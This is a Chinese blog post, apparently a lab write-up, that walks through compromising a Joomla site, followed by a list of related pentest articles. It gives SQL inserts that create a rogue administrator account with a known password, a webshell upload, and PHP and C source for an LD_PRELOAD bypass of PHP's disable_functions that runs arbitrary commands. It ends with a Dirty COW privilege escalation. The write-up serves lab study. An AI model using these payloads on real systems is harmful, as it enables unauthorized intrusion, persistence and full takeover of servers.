joomla渗透测试(脏牛提权)

最新推荐文章于 2023-11-30 17:15:11 发布
最新推荐文章于 2023-11-30 17:15:11 发布
阅读量1k 收藏 2
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/106133091
版权
本来是个域渗透,不过环境有问题,就当作web题在做了


解题过程

在这里插入图片描述这是一个joomla cms

  • 我们先扫一下目录
    在这里插入图片描述

  • 连接mysql
    得到MySQL的账号和密码
    在这里插入图片描述在这里插入图片描述然后创建新的管理员

     INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());

    INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');

    这儿创建的管理员账号为admin2 secret
    不同的网站对应不同的前缀,改一下前缀即可

  • 登录后台,上传shell
    在这里插入图片描述在这里插入图片描述访问/templates/beez3//HyyMBb.php,即可getshell
    在这里插入图片描述

  • 绕过disable_function
    上传cmd.php

     <?php
#move_uploaded_file($_FILES['evil']['tmp_name'], '/var/www/html/admin/shells/fEsiIOZ6Eup6pSW6/evil.so');
putenv('LD_PRELOAD=/tmp/evil.so');
putenv("_evilcmd=ls");
mail('a','a','a');
echo file_get_contents('/tmp/result.txt');
?>

    编译evil.c然后上传到/tmp目录下

    /* compile: gcc -Wall -fPIC -shared -o evil.so evil.c -ldl */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void payload(char *cmd) {
  char buf[512];
  strcpy(buf, cmd);
  strcat(buf, " > /tmp/result.txt");
  system(buf);}

int getuid() {
  char *cmd;
  if (getenv("LD_PRELOAD") == NULL) { return 0; }
  unsetenv("LD_PRELOAD");
  if ((cmd = getenv("_evilcmd")) != NULL) {
    payload(cmd);
  }
  return 1;
}

    在这里插入图片描述即可执行系统命令

  • 提权
    根据以下我们知道,这很明显是一个反向代理,实际的web服务不在192.168.1.110
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述找到一个账号密码,我们试一试能不能登录192.168.1.110
    在这里插入图片描述在这里插入图片描述直接使用脏牛提权
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述成功提权

HyyMbb
关注
专栏目录
joomla七牛插件
10-30
joomla七牛插件,加速网站的速度。系统会自动将你网站的静态内容同步到你的七牛空间,让你的Joomla网站飞起来!
[ 漏洞复现篇 ] Joomla未授权访问Rest API漏洞(CVE-2023-23752)
qq_51577576的博客
03-21 3703
[ 漏洞复现篇 ] Joomla未授权访问Rest API漏洞(CVE-2023-23752)
VULNHUB靶机渗透——DC-3(JoomlaCMS漏洞和Ubuntu16.04本地提权漏洞)
aarong的博客
12-31 2331
网络拓扑:攻击机kali和靶机dc-3同在NAT模式下 信息收集: arp-scan和nmap扫描: arp-scan -l nmap -T4 -A -v -p 1-65535 192.168.65.137 靶机开了80端口,待会浏览器访问 扫描出了Joomla好像是一个网络模板,百度搜一下看看: 猜对了,这就是一个网络模板 浏览器访问: 作者提示这次只有一个flag,要提权到root才能看到,并且没有任何提示。 dirsearch扫描网站路径:dirsearch -u http://192.1
vulnhub靶场之DC-3渗透教程(Joomla CMS)
旺仔Sec&blog
06-06 1270
靶机下载链接作者DCAU发布日期2020年4月25日难度中等1、这个靶场主要考了Joomla的cms框架,然后就是一个外部的提权文件来进行提权2、因此还是得要多熟悉一下常用的cms,说实话,这个上传点还找了蛮久的哈哈哈3、希望有不足之处,欢迎各位师傅点评一下!
红日靶场ATT3《前后端分离到漫游内网》
Snowdeng的博客
12-30 195
红日靶场ATT3《前后端分离到漫游内网》
Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)
qq_45722813的博客
12-07 3045
Vulnhub靶场渗透测试DC-3 靶机下载地址:https://www.five86.com/dc-3.html 攻击机为kali2021,IP地址:192.168.172.131 将靶机导入到VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用nmap进行存活主机发现来获取靶机IP地址,命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP,可能是靶机网络设置问题,参考文章:https://editor.csdn.net/md/?artic
椰树web漏洞扫描渗透测试工具
12-28
【椰树Web漏洞扫描渗透测试工具】是一款专为IT安全专业人士设计的软件,主要用于Web应用程序的安全检测和渗透测试。此工具包含多种功能,如Web漏洞扫描、批注、子域名查询、C段查询、后台扫描以及CMS(内容管理系统...
如何用XAMPP搭建Joomla本地测试服务器
06-18
### 如何用XAMPP搭建Joomla本地测试服务器 #### XAMPP的安装与简介 XAMPP是一款非常实用的工具包,集成了Apache、MySQL、PHP和Perl等多种Web开发环境所需的核心组件,使得开发者可以在本地计算机上轻松构建一套...
渗透测试面试题2019版.pdf
最新发布
03-14
- Windows系统下的溢出提权、Linux系统下的脏牛漏洞、内核版本漏洞提权等。 ### 清除测试痕迹与报告编写 **4. 清理测试数据** - 在完成渗透测试后,确保清除所有测试过程中产生的数据和痕迹。 - 包括删除WebShell...
DC3靶机渗透测试练习
10-05
因此,在 DC3靶机渗透测试练习中,我们需要扫描 Joomla 框架的漏洞,以便于发现潜在的漏洞和弱点。 在 Joomla 框架漏洞扫描阶段,我们使用了 joomscan 工具来扫描 Joomla 版本,发现潜在的漏洞和弱点。joomscan 是...
靶机渗透练习71-DC3
hirak0的博客
04-21 1051
靶机描述 靶机地址:http://www.vulnhub.com/entry/dc-32,312/ Description DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginners i
Vulnhub之 DC-3 joomla注入和ubuntu16.04提权
ST0new的博客
07-21 1343
Vulnhub靶机之DC-3 前言 刚考完试,然而不能放弃对技术的热爱,又重新拾起了dc准备把他们6个做完 今天介绍的是dc-3 ,来看看作者对他的评价 描述: DC-3是另一个专门建造的脆弱实验室,旨在获得渗透测试领域的经验。 与之前的DC版本一样,这个版本在设计时考虑了初学者,虽然这一次,只有一个标志,一个入口点,根本没有线索。 Linux技能和熟悉Linux命令行是必须的,基本渗透测...
内网域渗透总结——红日靶场
weixin_74545038的博客
11-30 1137
红日靶场三渗透总结
简单渗透测试流程学习一
qq_56426046的博客
09-09 513
————————————— 最不愿见到的…打开靶场的第一步就是信息收集,看网站的端口,系统,语言,中间件,指纹(cms),服务,等等。根据vs版本路径访问到xml文件找到版本3.7.0。根据找到的sql注入 漏洞,输入测试有限制。下载Joomla源码解压vs搜索查看版本。bp抓包重放修改传参方法利用脏数据绕过。利用burp添加正则爆破模块爆破出表名。打开御剑识别网站指纹为joomla。密码显示长度不同需要截取字符串。根据版本再去搜索相关漏洞。
渗透测试-vulnhub靶机 joker
2301_79441074的博客
11-23 296
kali配置代理 ,bp base64加密密码爆破,lxd提权
[ 常用工具篇 ]渗透神器OWASPJoomScan安装使用详解
qq_51577576的博客
04-15 2252
[ 常用工具篇 ]渗透神器OWASPJoomScan安装使用详解
红日靶场第三关
红队是青春
11-18 5783
红日靶场第三关 一、环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。 挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。 除重新获取ip,不建议进行任何虚拟机操作。 参考虚拟机网络配置,添加新的网络,该网络作为内部网络。 注:名称及网段必须符合上述图片,进行了固定ip配置。 本次环境为黑盒测试,不提供虚拟机账号密码。 win10/kali:VMnet11 攻击机 web-centos:VMnet10、VMnet11 外网 w
【甄选靶场】Vulnhub百个项目渗透——项目四十三 :BORN2ROOT-2(joomla
人间体佐菲的博客
10-17 746
【甄选靶场】Vulnhub百个项目渗透——项目十:IMF-1(joomla
CVE-2016-8870(Joomla 提权类漏洞 )
Fly_鹏程万里
03-15 1444
前言      Joomla是一套全球知名的内容管理系统。Joomla是使用PHP语言加上MySQL数据库所开发的软件系统,可以在Linux、Windows、MacOSX等各种不同的平台上执行。目前是由OpenSourceMatters这个开放源码组织进行开发与支持。  漏洞编号 CVE-2016-8870 漏洞影响范围 joomal 3.4.4 ~3.6.3 漏洞分析 在存在漏洞的...
基于Joomla渗透测试及加固
07-27
Joomla是一个流行的内容管理系统(CMS),用于建立和管理网站。在进行渗透测试和加固时,以下是一些步骤和建议可以帮助保护基于Joomla的网站: 渗透测试: 1. 信息收集:了解目标网站的架构、版本和插件信息。可以使用工具如Wappalyzer、Joomscan等来获取这些信息。 2. 漏洞扫描:使用漏洞扫描工具如Nikto、OpenVAS等对网站进行扫描,检查是否存在已知的漏洞。 3. 基于Web的漏洞测试:进行常见的Web漏洞测试,如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。使用工具如Burp Suite、OWASP ZAP等进行测试。 4. 弱密码检测:通过使用弱密码字典或爆破工具对Joomla后台登录进行测试,以确保管理员账户和其他用户账户设置了足够强度的密码。 5. 文件上传漏洞:检查是否存在不受限制的文件上传功能,并尝试上传可执行文件或恶意脚本来验证是否存在文件上传漏洞。 加固措施: 1. 更新和升级:确保Joomla及其插件、模板和扩展程序保持最新版本,以消除已知漏洞并修复安全问题。 2. 强密码策略:要求管理员和用户设置强密码,并定期更改密码。使用密码管理工具来生成和保存密码。 3. 访问控制:限制对Joomla后台的访问,并只授予必要的权限给用户。使用强大的身份验证方式,如双因素认证。 4. 安全插件:安装和配置安全插件,如Joomla Security Scanner、RSFirewall等,以提供额外的安全保护和监控。 5. 文件权限设置:确保文件和目录的权限设置正确,以防止未经授权的访问和修改。 6. 数据库安全:使用强密码保护数据库,并限制数据库用户的权限,只给予必要的访问权限。 7. 定期备份:定期备份Joomla网站和相关数据,以便在发生安全事件时进行恢复。 这些是一些基本的渗透测试和加固措施,但请注意,安全是一个持续的过程。建议进行定期的安全审查和更新,以保持网站的安全性。同时,如果你不是专业的渗透测试人员,请务必在进行任何测试之前取得网站所有者的明确授权。希望这些信息对你有所帮助!如有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值